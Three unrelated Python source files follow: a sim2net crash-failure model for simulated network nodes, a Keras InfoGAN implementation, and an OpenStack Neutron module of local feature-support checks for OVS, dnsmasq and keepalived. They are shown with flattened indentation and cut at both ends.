- **maximum_crash_number** (`int`): the maximum number of faulty
processes;
- **total_simulation_steps** (`int`): the total number of
simulation steps;
- **transient_steps** (`int`): a number of steps at the beginning
of the simulation during which no crashes occur (default: `0`).
*Raises*:
- **ValueError**: raised when the given value of the *time* object
is `None`; or when the given number of nodes is less than or
equal to zero; or when the given crash probability is less than
zero or grater than one; or when the given value of the maximum
number of faulty processes or the given value of the total
simulation steps is less than zero; or when the number of steps
in the transient period is less than zero or greater than the
given value of the total simulation steps.
"""
super(Crash, self).__init__(Crash.__name__)
if time is None:
raise ValueError('Parameter "time": a time abstraction object'
' expected but "None" value given!')
check_argument_type(Crash.__name__, 'nodes_number', int, nodes_number,
self.logger)
if nodes_number <= 0:
raise ValueError('Parameter "nodes_number": the number of nodes'
' cannot be less or equal to zero but %d given!'
% int(nodes_number))
check_argument_type(Crash.__name__, 'crash_probability', float,
crash_probability, self.logger)
if crash_probability < 0.0 or crash_probability > 1.0:
raise ValueError('Parameter "crash_probability": a value of the'
' crash probability parameter cannot be less'
' than zero and greater than one but %f given!'
% float(crash_probability))
check_argument_type(Crash.__name__, 'maximum_crash_number', int,
maximum_crash_number, self.logger)
if maximum_crash_number < 0:
raise ValueError('Parameter "maximum_crash_number": a value of'
' the maximum number of crashes cannot be less'
' than zero but %d given!'
% int(maximum_crash_number))
check_argument_type(Crash.__name__, 'total_simulation_steps', int,
total_simulation_steps, self.logger)
if total_simulation_steps < 0:
raise ValueError('Parameter "total_simulation_steps": a value of'
' the total number of simulation steps cannot be'
' less than zero but %d given!'
% int(total_simulation_steps))
check_argument_type(Crash.__name__, 'transient_steps', int,
transient_steps, self.logger)
if transient_steps < 0 or transient_steps > total_simulation_steps:
raise ValueError('Parameter "transient_steps": a number of the'
' transient steps cannot be less than zero or'
' greater than the total number of simulation'
' steps but %d given!' % int(transient_steps))
self.__time = time
self.__crashed = \
self.__crashes(int(nodes_number),
float(crash_probability), int(maximum_crash_number),
int(total_simulation_steps), int(transient_steps))
def __crashes(self, nodes_number, crash_probability, maximum_crash_number,
total_simulation_steps, transient_steps):
"""
Determines faulty processes and their times of crash with the use of
the given *crash probability*. There is also a possibility to setup a
transient period (at the beginning of the simulation), during which
process failures do not occur, and the total number of faulty processes
can also be limited to a given value.
*Parameters*:
- **nodes_number** (`int`): the total number of nodes in the
simulated network;
- **crash_probability** (`float`): the probability that a single
process will crash during the total simulation time;
- **maximum_crash_number** (`int`): the maximum number of faulty
processes;
- **total_simulation_steps** (`int`): the total number of
simulation steps;
- **transient_steps** (`int`): a number of steps at the beginning
of the simulation during which no crashes occur (default: `0`).
*Returns*:
A `list` of `tuples`; each tuple contains an identifier of the node
with faulty process and its time of crash (in simulation steps).
The list is sorted in ascending order by crash times.
"""
if maximum_crash_number == 0:
return []
crashes = [-1] * nodes_number
crashes_number = 0
for node_id in xrange(nodes_number):
crash = self.random_generator.uniform(0.0, 1.0)
if crash <= crash_probability:
crashes[node_id] = \
self.random_generator.uniform(0.0 + transient_steps,
total_simulation_steps)
crashes_number = crashes_number + 1
if crashes_number == maximum_crash_number:
break
self.random_generator.random_order(crashes)
crashed = dict()
for node_id in xrange(nodes_number):
if crashes[node_id] > 0:
crashed[node_id] = int(crashes[node_id])
assert len(crashed) <= maximum_crash_number, \
'The number of faulty process (%d) is greater then the maximum' \
' value (%d)!' % (len(crashes), maximum_crash_number)
return sorted(crashed.iteritems(), key=operator.itemgetter(1))
def node_failure(self, failures):
"""
Gives *in place* information about nodes which processes have failed
according to the crash model.
*Parameters*:
- **failures** (`list`): a list of boolean values of the size equal
to the total number of nodes in the simulated network; `True`
value in position :math:`i` indicates that the process on node
number :math:`i` has failed.
*Returns*"
A `list` of nodes which processes failed at the current simulation
step.
*Examples*:
In order to avoid any process failures use this class with the
*crash_probability* and/or *maximum_crash_number* parameters set to
`0`, as in the examples below.
.. testsetup::
from sim2net._time import Time
from sim2net.failure.crash import Crash
.. doctest::
>>> clock = Time()
>>> clock.setup()
>>> crash = Crash(clock, 4, 0.0, 0, 2)
>>> failures = [False, False, False, False]
>>> clock.tick()
(0, 0.0)
>>> crash.node_failure(failures)
[]
>>> print failures
[False, False, False, False]
>>> clock.tick()
(1, 1.0)
>>> crash.node_failure(failures)
[]
>>> print failures
[False, False, False, False]
>>> clock = Time()
>>> clock.setup()
>>> crash = Crash(clock, 4, 1.0, 0, 2)
>>> failures = [False, False, False, False]
>>> clock.tick()
(0, 0.0)
>>> crash.node_failure(failures)
[]
>>> print failures
[False, False, False, False]
>>> clock.tick()
(1, 1.0)
>>> crash.node_failure(failures)
[]
>>> print failures
[False, False, False, False]
"""
crashes = list()
while self.__crashed:
if self.__crashed[0][1] <= self.__time.simulation_step:
failures[self.__crashed[0][0]] = True
crashes.append(self.__crashed[0][0])
self.logger.debug('In accordance with the node failure model'
' node #%d has failed'
% self.__crashed[0][0])
self.__crashed.pop(0)
else:
break
return crashes
|
|
import numpy as np
import keras.backend as K
from keras.activations import linear
from keras.models import Model as K_Model
from keras.layers import Input, Activation, TimeDistributed, Dense
from keras.optimizers import Adam
from keras.layers.core import Lambda
from keras.layers.merge import Concatenate
from learn.models.interfaces import Model, InfoganPrior, InfoganGenerator, InfoganDiscriminator, \
InfoganEncoder
class InfoGAN2(Model):
"""
Puts together different networks to form the InfoGAN network as per:
"InfoGAN: Interpretable Representation Learning by Information Maximizing Generative Adversarial
Nets" by Xi Chen, Yan Duan, Rein Houthooft, John Schulman, Ilya Sutskever, Pieter Abbeel
"""
def __init__(self,
batch_size,
data_shape,
prior,
generator,
shared_net,
discriminator,
encoder,
recurrent_dim):
"""__init__
:param batch_size - number of real samples passed at each iteration
:param data_shape - e.g. (img_height, img_width, n_chan), shape of generated images
:param prior - where the latents in infogan are sampled from
:param generator - G model
:param shared_net - network model shared between E and D
:param discriminator - D model
:param encoder - E model
:param recurrent_dim - set to None if data is not recurrent
"""
self.batch_size = batch_size
self.data_shape = data_shape
self.prior = prior
self.generator = generator
self.shared_net = shared_net
self.discriminator = discriminator
self.encoder = encoder
self.recurrent_dim = recurrent_dim
if self.recurrent_dim:
self.shape_prefix = (self.recurrent_dim, )
else:
self.shape_prefix = ()
# PUTTING IT TOGETHER
self.sampled_latents, self.prior_param_inputs = self.prior.sample()
self.generated = self.generator.generate(self.sampled_latents)
self.real_input = Input(shape=self.shape_prefix + self.data_shape,
name="real_data_input")
self.real_labels = encoder.get_labels_input()
shared_gen = self.shared_net.apply(self.generated)
shared_real = self.shared_net.apply(self.real_input)
self.gen_encodings = self.encoder.encode(shared_gen)
mi_losses, E_gen_loss_outputs = self.encoder.get_mi_loss(self.sampled_latents,
self.gen_encodings)
self.real_encodings = self.encoder.encode(shared_real)
# this can be empty if the encoder is not supervised
sup_losses, E_real_loss_outputs = self.encoder.get_supervised_loss(self.real_labels,
self.real_encodings)
enc_losses = merge_dicts(mi_losses, sup_losses)
self.disc_real = self.discriminator.discriminate(shared_real)
self.disc_gen = self.discriminator.discriminate(shared_gen)
disc_losses, D_loss_outputs = self.discriminator.get_loss(
self.disc_real, self.disc_gen)
# DISCRIMINATOR TRAINING MODEL
self.generator.freeze()
disc_train_inputs = [self.real_input]
if self.encoder.supervised_dist:
disc_train_inputs.append(self.real_labels)
disc_train_inputs += self.prior_param_inputs
disc_train_outputs = D_loss_outputs + E_real_loss_outputs + E_gen_loss_outputs
self.disc_train_model = K_Model(inputs=disc_train_inputs,
outputs=disc_train_outputs,
name="disc_train_model")
disc_train_losses = merge_dicts(disc_losses, enc_losses)
self.disc_train_model.compile(optimizer=Adam(lr=2e-4, beta_1=0.2),
loss=disc_train_losses)
# GENERATOR TRAINING MODEL
self.generator.unfreeze()
self.shared_net.freeze()
self.discriminator.freeze()
self.encoder.freeze()
gen_losses, G_loss_outputs = self.generator.get_loss(self.disc_gen)
gen_losses = merge_dicts(gen_losses, mi_losses)
self.gen_train_model = K_Model(inputs=self.prior_param_inputs,
outputs=G_loss_outputs + E_gen_loss_outputs,
name="gen_train_model")
self.gen_train_model.compile(optimizer=Adam(lr=1e-3, beta_1=0.2),
loss=gen_losses)
# FOR DEBUGGING
self.sample_debug = K.function(inputs=[K.learning_phase()] + self.prior_param_inputs,
outputs=[self.sampled_latents['c1']])
self.gen_and_predict = K.function(inputs=[K.learning_phase()] + self.prior_param_inputs,
outputs=[G_loss_outputs[0], self.generated])
self.disc_predict = K.function(inputs=[K.learning_phase(), self.real_input],
outputs=[D_loss_outputs[0]])
def sanity_check(self):
"""_sanity_check
Checks that the gen_train_model uses the same discriminator weights
as in the disc_model.
"""
prior_params = self.prior.assemble_prior_params()
gen_score, samples = self.gen_and_predict([0] + prior_params)
# disc_score1 = self.disc_model.predict(samples)
disc_score2 = self.disc_predict([0, samples])
# assert np.all(np.isclose(gen_score, disc_score1, atol=1.e-2))
assert np.all(np.equal(gen_score, disc_score2))
print("Passed")
def _train_disc_pass(self, samples_batch, labels_batch=None):
dummy_targets = [np.ones((self.batch_size, ) + self.shape_prefix + (1, ), dtype=np.float32)] * \
len(self.disc_train_model.outputs)
inputs = [samples_batch]
if labels_batch is None and self.encoder.supervised_dist:
dim = self.meaningful_dists[self.supervised_dist_name].sample_size()
labels_batch = np.zeros((self.batch_size,) + self.shape_prefix + (dim, ))
if self.encoder.supervised_dist:
inputs += [labels_batch]
prior_params = self.prior.assemble_prior_params()
return self.disc_train_model.train_on_batch(inputs + prior_params,
dummy_targets)
def _train_gen_pass(self):
dummy_targets = [np.ones((self.batch_size, ) + self.shape_prefix + (1, ), dtype=np.float32)] * \
len(self.gen_train_model.outputs)
prior_params = self.prior.assemble_prior_params()
return self.gen_train_model.train_on_batch(prior_params,
dummy_targets)
def train_on_minibatch(self, samples, labels=None):
disc_losses = self._train_disc_pass(samples, labels)
gen_losses = self._train_gen_pass()
loss_logs = dict(zip(self.gen_train_model.metrics_names, gen_losses))
loss_logs = merge_dicts(loss_logs,
dict(zip(self.disc_train_model.metrics_names, disc_losses)))
return {'losses': loss_logs}
def load_weights(self, gen_weights_filepath, disc_weights_filepath):
self.disc_train_model.load_weights(disc_weights_filepath)
self.gen_train_model.load_weights(gen_weights_filepath)
class InfoganPriorImpl(InfoganPrior):
def __init__(self,
meaningful_dists,
noise_dists,
prior_params,
recurrent_dim):
super(InfoganPriorImpl, self).__init__(meaningful_dists,
noise_dists, prior_params, recurrent_dim)
if self.recurrent_dim:
self.shape_prefix = (self.recurrent_dim, )
else:
self.shape_prefix = ()
def sample(self):
samples = {}
prior_param_inputs = []
for name, dist in self.noise_dists.items():
sample, param_inputs = self._sample_latent(name, dist)
samples[name] = sample
prior_param_inputs += param_inputs
for name, dist in self.meaningful_dists.items():
sample, param_inputs = self._sample_latent(name, dist)
samples[name] = sample
prior_param_inputs += param_inputs
return samples, prior_param_inputs
def _sample_latent(self, dist_name, dist):
param_names = []
param_inputs = []
param_dims = []
for param_name, (dim, _) in dist.param_info().items():
param_input = Input(shape=self.shape_prefix + (dim, ),
name="g_input_{}_{}".format(dist_name, param_name))
param_inputs.append(param_input)
param_dims.append(dim)
param_names.append(param_name)
def sampling_fn(merged_params):
param_dict = {}
i = 0
for param_name, dim in zip(param_names, param_dims):
if self.recurrent_dim:
param = merged_params[:, :, i:i + dim]
else:
param = merged_params[:, i:i + dim]
param_dict[param_name] = param
i += dim
sample = dist.sample(param_dict)
return sample
if len(param_inputs) > 1:
merged_params = Concatenate(axis=-1,
name="g_params_{}".format(dist_name))(param_inputs)
else:
merged_params = param_inputs[0]
sample = Lambda(function=sampling_fn,
name="g_sample_{}".format(dist_name),
output_shape=self.shape_prefix + (dist.sample_size(), ))(merged_params)
return sample, param_inputs
def assemble_prior_params(self):
params = []
for dist_name, dist in self.noise_dists.items():
for param_name in dist.param_info():
params.append(self.prior_params[dist_name][param_name])
for dist_name, dist in self.meaningful_dists.items():
for param_name in dist.param_info():
params.append(self.prior_params[dist_name][param_name])
return params
class InfoganGeneratorImpl(InfoganGenerator):
def __init__(self,
data_shape,
meaningful_dists,
noise_dists,
data_q_dist,
network,
recurrent_dim):
super(InfoganGeneratorImpl, self).__init__(data_shape,
meaningful_dists, noise_dists, data_q_dist,
network, recurrent_dim)
if self.recurrent_dim:
self.shape_prefix = (self.recurrent_dim, )
else:
self.shape_prefix = ()
def generate(self, prior_samples):
"""
generate - applies the generator to a dictionary of samples from the different
salient and noise distributions to generate a sample from p_G(x)
:param prior_samples: dict, keys are dist. names, values are sampled keras tensors
"""
sampled_latents_flat = list(prior_samples.values())
merged_samples = Concatenate(axis=-1, name="g_concat_prior_samples")(sampled_latents_flat)
generation_params = self.network.apply(inputs=merged_samples)
generated = Lambda(function=self._sample_data,
output_shape=self.shape_prefix + self.data_shape,
name="g_x_sampling")(generation_params)
return generated
def _sample_data(self, params):
params_dict = {}
i = 0
for param_name, (param_dim, param_activ) in self.data_q_dist.param_info().items():
if self.recurrent_dim:
param = params[:, :, i:i + param_dim]
else:
param = params[:, i:i + param_dim]
params_dict[param_name] = param_activ(param)
sampled_data = self.data_q_dist.sample(params_dict)
if self.recurrent_dim:
sampled_data = sampled_data[:, :, 0]
else:
sampled_data = sampled_data[:, 0]
return sampled_data
def get_loss(self, disc_gen_output):
# add a dummy activation layer, just to be able to name it properly
loss_layer_name = "G_gen_loss"
gen_output = Activation(activation=linear, name=loss_layer_name)(disc_gen_output)
def gen_loss(targets, preds):
# NOTE: targets are ignored, cause it's clear those are generated samples
return -K.log(preds + K.epsilon())
return {loss_layer_name: gen_loss}, [gen_output]
def freeze(self):
self.network.freeze()
def unfreeze(self):
self.network.unfreeze()
class InfoganDiscriminatorImpl(InfoganDiscriminator):
def __init__(self,
network):
super(InfoganDiscriminatorImpl, self).__init__(network)
def discriminate(self, samples):
preactiv = self.network.apply(samples)
output = Activation(activation=K.sigmoid)(preactiv)
return output
def get_loss(self, disc_real_output, disc_gen_output):
loss_real_name = "D_real_loss"
loss_gen_name = "D_gen_loss"
real_output = Activation(activation=linear, name=loss_real_name)(disc_real_output)
gen_output = Activation(activation=linear, name=loss_gen_name)(disc_gen_output)
def disc_real_loss(targets, real_preds):
# NOTE: targets are ignored, cause it's clear those are real samples
return -K.log(real_preds + K.epsilon()) / 2.0
def disc_gen_loss(targets, gen_preds):
# NOTE: targets are ignored, cause it's clear those are real samples
return -K.log(1 - gen_preds + K.epsilon()) / 2.0
return {loss_real_name: disc_real_loss, loss_gen_name: disc_gen_loss}, \
[real_output, gen_output]
def freeze(self):
self.network.freeze()
def unfreeze(self):
self.network.unfreeze()
class InfoganEncoderImpl(InfoganEncoder):
def __init__(self,
batch_size,
meaningful_dists,
supervised_dist,
network,
recurrent_dim):
super(InfoganEncoderImpl, self).__init__(batch_size,
meaningful_dists, supervised_dist,
network, recurrent_dim)
if self.recurrent_dim:
self.shape_prefix = (self.recurrent_dim, )
else:
self.shape_prefix = ()
# Define meaningful dist output layers
self.dist_output_layers = {}
for dist_name, dist in self.meaningful_dists.items():
info = dist.param_info()
self.dist_output_layers[dist_name] = {}
for param, (dim, activation) in info.items():
preact = Dense(dim, name="e_dense_{}_{}".format(dist_name, param))
if self.recurrent_dim:
preact = TimeDistributed(preact, name="e_time_{}_{}".format(dist_name, param))
act = Activation(activation, name="e_activ_{}_{}".format(dist_name, param))
self.dist_output_layers[dist_name][param] = [preact, act]
# define an ordering of params for each dist
self.orderings = {}
for dist_name, dist in self.meaningful_dists.items():
self.orderings[dist_name] = list()
for param_name, (dim, _) in dist.param_info().items():
self.orderings[dist_name].append((param_name, dim))
def encode(self, samples):
enc_preact = self.network.apply(samples)
encodings = self._add_enc_outputs(enc_preact)
return encodings
def _add_enc_outputs(self, enc_preact):
posterior_outputs = {}
for dist_name, dist in self.meaningful_dists.items():
param_outputs_dict = self._make_enc_outputs(dist_name, dist, enc_preact)
posterior_outputs[dist_name] = param_outputs_dict
return posterior_outputs
def _make_enc_outputs(self, dist_name, dist, layer):
outputs = {}
for param, param_layers in self.dist_output_layers[dist_name].items():
out = layer
for param_layer in param_layers:
out = param_layer(out)
outputs[param] = out
return outputs
def _make_loss_output(self, dist_name, param_outputs_dict):
param_outputs_list = []
for param_name, _ in self.orderings[dist_name]:
param_outputs_list.append(param_outputs_dict[param_name])
if len(param_outputs_list) > 1:
merged_params = Concatenate(axis=-1)(param_outputs_list)
else:
merged_params = param_outputs_list[0]
return merged_params
def get_mi_loss(self, sampled_latents, gen_encodings):
loss_outputs = []
mi_losses = {}
for dist_name, dist in self.meaningful_dists.items():
param_outputs_dict = gen_encodings[dist_name]
loss_output_name = "E_mi_loss_{}".format(dist_name)
loss_output = self._make_loss_output(dist_name, param_outputs_dict)
loss_output = Activation(activation=linear,
name=loss_output_name)(loss_output)
loss_outputs.append(loss_output)
mi_loss = self._build_loss(sampled_latents[dist_name], dist, self.orderings[dist_name])
mi_losses[loss_output_name] = mi_loss
return mi_losses, loss_outputs
def _build_loss(self, samples, dist, param_infos):
def enc_loss(dummy, param_outputs):
param_dict = {}
param_index = 0
for param_name, dim in param_infos:
if self.recurrent_dim:
param = param_outputs[:, :, param_index:param_index + dim]
else:
param = param_outputs[:, param_index:param_index + dim]
param_dict[param_name] = param
param_index += dim
loss = dist.nll(samples, param_dict)
return loss
return enc_loss
def get_supervised_loss(self, real_labels, real_encodings):
if not self.supervised_dist:
return {}, []
dist = self.meaningful_dists[self.supervised_dist]
param_outputs_dict = real_encodings[self.supervised_dist]
loss = self._build_loss(real_labels, dist,
self.orderings[self.supervised_dist])
# since some real instances might not have a label, I assume that
# this is indicated by all labels in the batch being set to 0 everywhere
# (which is never the case for discrete labels, and almost impossible for
# continuous labels)
def wrapped_loss(targets, preds):
labels_missing = K.all(K.equal(self.real_labels,
K.zeros_like(self.real_labels)))
return K.switch(labels_missing,
K.zeros((self.batch_size, ) + self.shape_prefix, 1), loss(targets, preds))
loss_output_name = "E_supervised_loss_{}".format(self.supervised_dist)
loss_output = self._make_loss_output(self.supervised_dist, param_outputs_dict)
loss_output = Activation(activation=linear,
name=loss_output_name)(loss_output)
return {loss_output_name: wrapped_loss}, [loss_output]
def get_labels_input(self):
if not self.supervised_dist:
return None
dim = self.meaningful_dists[self.supervised_dist].sample_size()
return Input(shape=self.shape_prefix + (dim, ), name="labels_input")
def freeze(self):
for param_layers_dict in self.dist_output_layers.values():
for param_layers in param_layers_dict.values():
for layer in param_layers:
layer.trainable = False
self.network.freeze()
def unfreeze(self):
for param_layers_dict in self.dist_output_layers.values():
for param_layers in param_layers_dict.values():
for layer in param_layers:
layer.trainable = True
self.network.unfreeze()
def merge_dicts(x, y):
z = x.copy()
z.update(y)
return z
|
|
# Copyright (c) 2014 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import distutils
import enum
import re
import shutil
import tempfile
import netaddr
from neutron_lib import constants as n_consts
from neutron_lib import exceptions
from neutron_lib.utils import helpers
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from oslo_utils import versionutils
from neutron.agent.common import ovs_lib
from neutron.agent.l3 import ha_router
from neutron.agent.l3 import namespaces
from neutron.agent.linux import external_process
from neutron.agent.linux import ip_lib
from neutron.agent.linux import keepalived
from neutron.agent.linux import utils as agent_utils
from neutron.common import utils as common_utils
from neutron.conf.agent.l3 import config as l3_config
from neutron.plugins.ml2.drivers.openvswitch.agent.common \
import constants as ovs_const
from neutron.privileged.agent.linux import dhcp as priv_dhcp
LOG = logging.getLogger(__name__)
MINIMUM_DNSMASQ_VERSION = '2.67'
DNSMASQ_VERSION_DHCP_RELEASE6 = '2.76'
DNSMASQ_VERSION_HOST_ADDR6_LIST = '2.81'
DIRECT_PORT_QOS_MIN_OVS_VERSION = '2.11'
MINIMUM_DIBBLER_VERSION = '1.0.1'
CONNTRACK_GRE_MODULE = 'nf_conntrack_proto_gre'
OVN_NB_DB_SCHEMA_PORT_GROUP = '5.11'
OVN_NB_DB_SCHEMA_STATELESS_NAT = '5.17'
OVN_SB_DB_SCHEMA_VIRTUAL_PORT = '2.5'
class OVNCheckType(enum.Enum):
nb_version = 0
nb_db_schema = 1
sb_version = 2
sb_db_schema = 3
def _get_ovn_version(check_type):
if check_type in (OVNCheckType.nb_version, OVNCheckType.nb_db_schema):
cmd = ['ovn-nbctl', '--version']
elif check_type in (OVNCheckType.nb_version, OVNCheckType.nb_db_schema):
cmd = ['ovn-sbctl', '--version']
else:
raise RuntimeError
out = agent_utils.execute(cmd)
if check_type == OVNCheckType.nb_version:
matched_line = re.search(r"ovn-nbctl.*", out)
elif check_type == OVNCheckType.sb_version:
matched_line = re.search(r"ovn-sbctl.*", out)
else:
matched_line = re.search(r"DB Schema.*", out)
matched_version = re.search(r"(\d+\.\d+)", matched_line.group(0))
return versionutils.convert_version_to_tuple(matched_version.group(1) if
matched_version else '0.0')
def ovs_vxlan_supported(from_ip='192.0.2.1', to_ip='192.0.2.2'):
br_name = common_utils.get_rand_device_name(prefix='vxlantest-')
port_name = common_utils.get_rand_device_name(prefix='vxlantest-')
with ovs_lib.OVSBridge(br_name) as br:
port = br.add_tunnel_port(
port_name=port_name,
remote_ip=from_ip,
local_ip=to_ip,
tunnel_type=n_consts.TYPE_VXLAN)
return port != ovs_lib.INVALID_OFPORT
def ovs_geneve_supported(from_ip='192.0.2.3', to_ip='192.0.2.4'):
br_name = common_utils.get_rand_device_name(prefix='genevetest-')
port_name = common_utils.get_rand_device_name(prefix='genevetest-')
with ovs_lib.OVSBridge(br_name) as br:
port = br.add_tunnel_port(
port_name=port_name,
remote_ip=from_ip,
local_ip=to_ip,
tunnel_type=n_consts.TYPE_GENEVE)
return port != ovs_lib.INVALID_OFPORT
def iproute2_vxlan_supported():
ip = ip_lib.IPWrapper()
name_dummy = common_utils.get_rand_device_name(prefix='vxlantest-')
ip.add_dummy(name_dummy)
name = common_utils.get_rand_device_name(prefix='vxlantest-')
port = ip.add_vxlan(name, 3000, name_dummy)
ip.del_veth(name)
return name == port.name
def patch_supported():
name, peer_name, patch_name = common_utils.get_related_rand_device_names(
['patchtest-', 'peertest0-', 'peertest1-'])
with ovs_lib.OVSBridge(name) as br:
port = br.add_patch_port(patch_name, peer_name)
return port != ovs_lib.INVALID_OFPORT
def nova_notify_supported():
try:
# pylint:disable=import-outside-toplevel
import neutron.notifiers.nova # noqa since unused
return True
except ImportError:
return False
def ofctl_arg_supported(cmd, **kwargs):
"""Verify if ovs-ofctl binary supports cmd with **kwargs.
:param cmd: ovs-ofctl command to use for test.
:param **kwargs: arguments to test with the command.
:returns: a boolean if the supplied arguments are supported.
"""
br_name = common_utils.get_rand_device_name(prefix='br-test-')
with ovs_lib.OVSBridge(br_name) as test_br:
full_args = ["ovs-ofctl", cmd, test_br.br_name,
ovs_lib._build_flow_expr_str(kwargs, cmd.split('-')[0],
False)]
try:
agent_utils.execute(full_args, run_as_root=True,
privsep_exec=True)
except RuntimeError as e:
LOG.debug("Exception while checking supported feature via "
"command %s. Exception: %s", full_args, e)
return False
except Exception:
LOG.exception("Unexpected exception while checking supported"
" feature via command: %s", full_args)
return False
else:
return True
def arp_responder_supported():
mac = netaddr.EUI('dead:1234:beef', dialect=netaddr.mac_unix)
ip = netaddr.IPAddress('240.0.0.1')
actions = ovs_const.ARP_RESPONDER_ACTIONS % {'mac': mac, 'ip': ip}
return ofctl_arg_supported(cmd='add-flow',
table=21,
priority=1,
proto='arp',
dl_vlan=42,
nw_dst='%s' % ip,
actions=actions)
def arp_header_match_supported():
return ofctl_arg_supported(cmd='add-flow',
table=24,
priority=1,
proto='arp',
arp_op='0x2',
arp_spa='1.1.1.1',
actions="NORMAL")
def icmpv6_header_match_supported():
return ofctl_arg_supported(cmd='add-flow',
table=ovs_const.ARP_SPOOF_TABLE,
priority=1,
dl_type=n_consts.ETHERTYPE_IPV6,
nw_proto=n_consts.PROTO_NUM_IPV6_ICMP,
icmp_type=n_consts.ICMPV6_TYPE_NA,
nd_target='fdf8:f53b:82e4::10',
actions="NORMAL")
def netns_read_requires_helper():
nsname = "netnsreadtest-" + uuidutils.generate_uuid()
ip_lib.create_network_namespace(nsname)
try:
# read without root_helper. if exists, not required.
exists = ip_lib.network_namespace_exists(nsname)
finally:
ip_lib.delete_network_namespace(nsname)
return not exists
def get_minimal_dnsmasq_version_supported():
return MINIMUM_DNSMASQ_VERSION
def get_dnsmasq_version_with_dhcp_release6():
return DNSMASQ_VERSION_DHCP_RELEASE6
def get_dnsmasq_version_with_host_addr6_list():
return DNSMASQ_VERSION_HOST_ADDR6_LIST
def get_ovs_version_for_qos_direct_port_support():
return DIRECT_PORT_QOS_MIN_OVS_VERSION
def dnsmasq_local_service_supported():
cmd = ['dnsmasq', '--test', '--local-service']
env = {'LC_ALL': 'C'}
obj, cmd = agent_utils.create_process(cmd, addl_env=env)
_stdout, _stderr = obj.communicate()
returncode = obj.returncode
if returncode == 127:
LOG.debug("Exception while checking dnsmasq version. "
"dnsmasq: No such file or directory")
return False
elif returncode == 1:
return False
return True
def dnsmasq_version_supported():
try:
cmd = ['dnsmasq', '--version']
env = {'LC_ALL': 'C'}
out = agent_utils.execute(cmd, addl_env=env)
m = re.search(r"version (\d+\.\d+)", out)
ver = distutils.version.StrictVersion(m.group(1) if m else '0.0')
if ver < distutils.version.StrictVersion(MINIMUM_DNSMASQ_VERSION):
return False
if (cfg.CONF.dnsmasq_enable_addr6_list is True and
ver < distutils.version.StrictVersion(
DNSMASQ_VERSION_HOST_ADDR6_LIST)):
LOG.warning('Support for multiple IPv6 addresses in host '
'entries was introduced in dnsmasq version '
'%(required)s. Found dnsmasq version %(current)s, '
'which does not support this feature. Unless support '
'for multiple IPv6 addresses was backported to the '
'running build of dnsmasq, the configuration option '
'dnsmasq_enable_addr6_list should be set to False.',
{'required': DNSMASQ_VERSION_HOST_ADDR6_LIST,
'current': ver})
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking minimal dnsmasq version. "
"Exception: %s", e)
return False
return True
def ovs_qos_direct_port_supported():
try:
cmd = ['ovs-vsctl', '-V']
out = agent_utils.execute(cmd)
matched_line = re.search(r"ovs-vsctl.*", out)
matched_version = re.search(r"(\d+\.\d+)", matched_line.group(0))
ver = versionutils.convert_version_to_tuple(matched_version.group(1) if
matched_version else '0.0')
minver = versionutils.convert_version_to_tuple(
DIRECT_PORT_QOS_MIN_OVS_VERSION)
if ver < minver:
return False
except (OSError, RuntimeError, ValueError) as e:
LOG.debug("Exception while checking minimal ovs version "
"required for supporting direct ports QoS rules. "
"Exception: %s", e)
return False
return True
def dhcp_release6_supported():
return priv_dhcp.dhcp_release6_supported()
def bridge_firewalling_enabled():
for proto in ('arp', 'ip', 'ip6'):
knob = 'net.bridge.bridge-nf-call-%stables' % proto
cmd = ['sysctl', '-b', knob]
try:
out = agent_utils.execute(cmd)
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while extracting %(knob)s. "
"Exception: %(e)s", {'knob': knob, 'e': e})
return False
if out == '0':
return False
return True
class KeepalivedIPv6Test(object):
def __init__(self, ha_port, gw_port, gw_vip, default_gw):
l3_config.register_l3_agent_config_opts(l3_config.OPTS, cfg.CONF)
self.ha_port = ha_port
self.gw_port = gw_port
self.gw_vip = gw_vip
self.default_gw = default_gw
self.manager = None
self.config = None
self.config_path = None
self.nsname = "keepalivedtest-" + uuidutils.generate_uuid()
self.pm = None
self.orig_interval = cfg.CONF.AGENT.check_child_processes_interval
def configure(self):
config = keepalived.KeepalivedConf()
instance1 = keepalived.KeepalivedInstance('MASTER', self.ha_port, 1,
['169.254.192.0/18'],
advert_int=5)
instance1.track_interfaces.append(self.ha_port)
# Configure keepalived with an IPv6 address (gw_vip) on gw_port.
vip_addr1 = keepalived.KeepalivedVipAddress(self.gw_vip, self.gw_port)
instance1.vips.append(vip_addr1)
# Configure keepalived with an IPv6 default route on gw_port.
gateway_route = keepalived.KeepalivedVirtualRoute(n_consts.IPv6_ANY,
self.default_gw,
self.gw_port)
instance1.virtual_routes.gateway_routes = [gateway_route]
config.add_instance(instance1)
self.config = config
def start_keepalived_process(self):
# Disable process monitoring for Keepalived process.
cfg.CONF.set_override('check_child_processes_interval', 0, 'AGENT')
self.pm = external_process.ProcessMonitor(cfg.CONF, 'router')
# Create a temp directory to store keepalived configuration.
self.config_path = tempfile.mkdtemp()
# Instantiate keepalived manager with the IPv6 configuration.
self.manager = keepalived.KeepalivedManager(
'router1', self.config,
namespace=self.nsname, process_monitor=self.pm,
conf_path=self.config_path)
self.manager.spawn()
def verify_ipv6_address_assignment(self, gw_dev):
process = self.manager.get_process()
common_utils.wait_until_true(lambda: process.active)
def _gw_vip_assigned():
iface_ip = gw_dev.addr.list(ip_version=6, scope='global')
if iface_ip:
return self.gw_vip == iface_ip[0]['cidr']
common_utils.wait_until_true(_gw_vip_assigned)
def __enter__(self):
ip_lib.create_network_namespace(self.nsname)
return self
def __exit__(self, exc_type, exc_value, exc_tb):
if self.pm:
self.pm.stop()
if self.manager:
self.manager.disable()
if self.config_path:
shutil.rmtree(self.config_path, ignore_errors=True)
ip_lib.delete_network_namespace(self.nsname)
cfg.CONF.set_override('check_child_processes_interval',
self.orig_interval, 'AGENT')
def keepalived_ipv6_supported():
"""Check if keepalived supports IPv6 functionality.
Validation is done as follows.
1. Create a namespace.
2. Create OVS bridge with two ports (ha_port and gw_port)
3. Move the ovs ports to the namespace.
